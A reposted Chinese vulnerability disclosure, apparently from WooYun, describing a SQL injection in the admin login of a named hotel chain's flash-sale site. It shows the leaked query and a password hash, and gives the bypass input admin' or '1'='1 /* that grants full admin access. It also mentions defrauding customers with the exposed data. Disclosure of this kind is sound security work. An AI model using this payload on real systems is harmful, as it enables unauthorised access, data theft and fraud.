• 后台SQL注入实例


    简要描述:

    汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.

    详细说明:

    问题发生在这个站点.http://miaosha.htinns.com/



    标题内没有写具体信息.因为怕发布后被人入侵.



    后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php



    帐号输入admin'

    登陆后提示如下图



    爆出了查询语句.


    Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '453e41d218e071ccfb2d1c99ce23906a'' at line 1]
    select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'





    重点在这里

    select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'

    然后构造绕过

    使用帐号admin' or '1'='1 /*

    成功绕过登陆后台,截图如下

    拥有后台全部权限...可以获得所有秒杀成功的数据,对其进行诈骗.

    也可以发布秒杀信息,造成汉庭信任公关危机...

     

    摘自:http://www.wooyun.org/bugs/wooyun-2010-05156

  • 相关阅读:
    内网Windows Server时间自动同步
    处理sqlserver数据
    virtualenv使用
    vue过渡动画效果
    vue视图
    vue组件
    Vue实例
    vue介绍
    Bootstrap布局
    Bootstrap组件
  • 原文地址:https://www.cnblogs.com/milantgh/p/3645709.html
Copyright © 2020-2023  润新知